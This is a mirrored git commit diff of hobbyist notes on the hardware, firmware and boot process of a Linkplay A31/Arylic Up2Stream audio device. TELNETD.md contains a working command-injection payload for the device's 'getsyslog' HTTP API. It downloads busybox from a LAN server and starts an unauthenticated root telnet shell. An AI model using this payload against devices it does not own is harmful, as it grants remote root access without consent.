mirror of
https://github.com/Jan21493/Linkplay.git
synced 2024-11-20 19:33:58 +00:00
-
This commit is contained in:
parent
34b9f14be7
commit
400bb3311d
3 changed files with 79 additions and 72 deletions
23
Hardware.md
23
Hardware.md
|
@ -1,4 +1,4 @@
|
|||
# Hardware
|
||||
# Hardware and Firmware
|
||||
The specs for the Linkplay A31 module are as follows
|
||||
```
|
||||
# cat /proc/cpuinfo
|
||||
|
@ -29,7 +29,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/
|
|||
|
||||
The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages
|
||||
|
||||
Here's an example how to download a package and get the binaries from it for a SSH server (dropbear):
|
||||
Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook:
|
||||
|
||||
```
|
||||
cd ~/Downloads
|
||||
|
@ -137,4 +137,23 @@ wget -O /tmp/file -T 5 'http://10.1.1.22/a31/file';/bin/chmod 777 /tmp/file
|
|||
|
||||
# on Up2Stream device:
|
||||
wget -O /tmp/strings -T 5 'http://10.1.1.22/a31/strings';/bin/chmod 777 /tmp/strings
|
||||
```
|
||||
Here are some code snippets from a script on the device (can't remember any details). It looks that the commands for NTP are not working anymore, also the commands to switch power for the WiFi interface off:
|
||||
```
|
||||
srv=`nvram_get 2860 NTPServerIP`
|
||||
sync=`nvram_get 2860 NTPSync`
|
||||
tz=`nvram_get 2860 TZ`
|
||||
nvram_set 2860 TZ
|
||||
|
||||
nvram_set 2860 RadioOn 0
|
||||
nvram_set 2860 ApCliEnable 0
|
||||
--> blinking LED, but apcli0 and ra0 still enabled after reboot
|
||||
|
||||
nvram_set 2860 TxPower 0 or 1
|
||||
--> no effect
|
||||
```
|
||||
You can turn the WiFi interface and the internal access point off with the following commands:
|
||||
```
|
||||
ifconfig ra0 down
|
||||
ifconfig apcli0 down
|
||||
```
|
19
TELNETD.md
19
TELNETD.md
|
@ -5,23 +5,20 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo
|
|||
|
||||
The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook.
|
||||
```
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash";
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash";
|
||||
```
|
||||
The command above is executing the following commands on the device:
|
||||
```
|
||||
wget -O /tmp/busybox -T 5 http://10.1.1.22/a31/busybox -q;
|
||||
/bin/chmod 777 /tmp/busybox;
|
||||
/tmp/busybox telnetd -l/bin/ash
|
||||
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/busybox -q;
|
||||
chmod 777 /tmp/bin/busybox;
|
||||
/tmp/bin/busybox telnetd -l/bin/ash
|
||||
```
|
||||
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here:
|
||||
|
||||
There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need:
|
||||
https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/
|
||||
|
||||
The binaries are included in packages
|
||||
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere.
|
||||
|
||||
A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information.
|
||||
|
||||
You may also redirect output and error output for telnetd:
|
||||
```
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;";
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;";
|
||||
```
|
||||
|
||||
|
|
109
boot-process.md
109
boot-process.md
|
@ -50,29 +50,41 @@ https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/
|
|||
and
|
||||
https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/
|
||||
|
||||
|
||||
Example to download the tools from the OpenWRT version Chaos Calmer:
|
||||
-----------------------------------------------
|
||||
uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
|
||||
Here's an example how to download a package from the Open WRT archive and get the binaries from it to show the environment. The commands were executed from a terminal window on my MacBook:
|
||||
```
|
||||
cd ~/Downloads
|
||||
curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/uboot-envtools_2014.10-2_ramips_24kec.ipk' -o uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
mkdir uboot-envtools_2014.10-2_ramips_24kec
|
||||
cd uboot-envtools_2014.10-2_ramips_24kec
|
||||
tar zxpvf ../uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
tar zxpvf control.tar.gz
|
||||
tar zxpvf data.tar.gz
|
||||
|
||||
wget -O /tmp/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv';/bin/chmod 777 /tmp/fw_printenv
|
||||
ln -s /tmp/fw_printenv /tmp/fw_setenv
|
||||
|
||||
# copy dropbear binary to a subdirectory on your webserver
|
||||
cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/
|
||||
# you may open finder to search for additional information in the package
|
||||
open .
|
||||
```
|
||||
In the next step you can you can download and install the tool on the Up2Stream device (telnetd already installed):
|
||||
```
|
||||
cd /tmp
|
||||
mkdir /tmp/bin
|
||||
wget -O /tmp/bin/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv'
|
||||
chmod 777 /tmp/bin/fw_printenv
|
||||
ln -s /tmp/bin/fw_printenv /tmp/bin/fw_setenv
|
||||
```
|
||||
and the same for dmesg:
|
||||
```
|
||||
cd ~/Downloads
|
||||
curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/dmesg_2.25.2-4_ramips_24kec.ipk' -o dmesg_2.25.2-4_ramips_24kec.ipk
|
||||
mkdir dmesg_2.25.2-4_ramips_24kec
|
||||
cd dmesg_2.25.2-4_ramips_24kec
|
||||
tar zxpvf ../dmesg_2.25.2-4_ramips_24kec.ipk
|
||||
tar zxpvf control.tar.gz
|
||||
tar zxpvf data.tar.gz
|
||||
open .
|
||||
# copy ./usr/sbin/dmesg to your webserver, e.g. /Library/WebServer/Documents/a31
|
||||
on Up2Stream device:
|
||||
cp ./usr/sbin/dmesg /Library/WebServer/Documents/a31
|
||||
```
|
||||
Installit on the Up2Stream device and dig for some useful information:
|
||||
```
|
||||
wget -O /tmp/dmesg -T 5 'http://10.1.1.22/a31/dmesg';/bin/chmod 777 /tmp/dmesg
|
||||
|
||||
cat /proc/version
|
||||
|
@ -127,41 +139,37 @@ mtd9: 00200000 00010000 "user2"
|
|||
[ 0.700000] 0x000000d80000-0x000000e00000 : "user"
|
||||
[ 0.712000] 0x000000e00000-0x000001000000 : "user2"
|
||||
...
|
||||
```
|
||||
Install **_dd_** from busybox and **_scp_** from dropbear package (see **_Enable Telnet_** section to install **_busybox_** and **_Hardware and Firmware_** section to install **dropbear**), then
|
||||
```
|
||||
# tools included in busybox just need a symbolic link with their name
|
||||
ln -s /tmp/bin/busybox /tmp/bin/dd
|
||||
## copy mtd1 to a file and save for future use
|
||||
dd if=/dev/mtd1 of=/tmp/mtd1.img bs=512 count=128000 skip=0
|
||||
scp -v -S /tmp/bin/dbclient /tmp/mtd1.img pi@10.1.1.40:mtd1.img
|
||||
rm /tmp/mtd1.img
|
||||
```
|
||||
--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. See **_cat /proc/mtd_** from above for details.
|
||||
|
||||
install dd from busybox and scp from dropbear package, then
|
||||
|
||||
dd if=/dev/mtd1 of=/tmp/mtd1.cp bs=512 count=128000 skip=0
|
||||
scp -v -S /tmp/bin/dbclient /tmp/mtd1.cp pi@10.1.1.40:mtd1.cp
|
||||
rm /tmp/mtd1.cp
|
||||
|
||||
--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied.
|
||||
|
||||
mtd1: 00030000 00010000 "Bootloader" - no environment variables
|
||||
mtd2: 00010000 00010000 "Config" - from 0x2000 to 0x6000
|
||||
mtd3: 00010000 00010000 "Factory"
|
||||
mtd4: 00200000 00010000 "bkKernel"
|
||||
mtd5: 001df508 00010000 "Kernel"
|
||||
mtd6: 00950af8 00010000 "RootFS"
|
||||
mtd7: 00b30000 00010000 "Kernel_RootFS"
|
||||
mtd8: 00080000 00010000 "user"
|
||||
mtd9: 00200000 00010000 "user2"
|
||||
|
||||
mkdir /var/lock
|
||||
|
||||
create file /etc/fw_env.config
|
||||
with
|
||||
Create the file **_/etc/fw_env.config_** with the following content, e.g. with vi:
|
||||
```
|
||||
cat <<\EOF > /etc/fw_env.config
|
||||
# MTD device name Device offset Env. size Flash sector size
|
||||
/dev/mtd2 0x02000 0x4000 0x4000
|
||||
|
||||
before setting the correct values:
|
||||
/tmp/fw_printenv
|
||||
EOF
|
||||
mkdir /var/lock
|
||||
```
|
||||
Before setting the correct values for the size the following error is shown:
|
||||
```
|
||||
fw_printenv
|
||||
Warning: Bad CRC, using default environment
|
||||
bootcmd=bootp; setenv bootargs root=/dev/nfs nfsroot=${serverip}:${rootpath} ip=${ipaddr}:${serverip}:${gatewayip}:${netmask}:${hostname}::off; bootm
|
||||
bootdelay=5
|
||||
baudrate=115200
|
||||
|
||||
with settings from above:
|
||||
# fw_printenv
|
||||
```
|
||||
With the correct settings from above you get a list with all environment variables. These values are stored in NVRAM, so they will survive a reboot:
|
||||
```
|
||||
fw_printenv
|
||||
WebInit=1
|
||||
HostName=wiimu
|
||||
OperationMode=3
|
||||
|
@ -369,26 +377,9 @@ ApCliAuthMode=WPA2PSK
|
|||
ApCliEncrypType=AES
|
||||
ApCliChannel=6
|
||||
|
||||
# show contents of NVRAM
|
||||
# a similar output will provide
|
||||
ralink_init show 2860
|
||||
|
||||
--> similar output
|
||||
|
||||
code snippet from a script:
|
||||
srv=`nvram_get 2860 NTPServerIP`
|
||||
sync=`nvram_get 2860 NTPSync`
|
||||
tz=`nvram_get 2860 TZ`
|
||||
nvram_set 2860 TZ
|
||||
```
|
||||
|
||||
|
||||
nvram_set 2860 RadioOn 0
|
||||
nvram_set 2860 ApCliEnable 0
|
||||
|
||||
--> blinking LED, but apcli0 and ra0 still enabled after reboot
|
||||
|
||||
nvram_set 2860 TxPower 0 or 1
|
||||
|
||||
--> no effect
|
||||
|
||||
The environment is usually at the end of the uboot partition.
|
||||
|
||||
|
|
Loading…
Reference in a new issue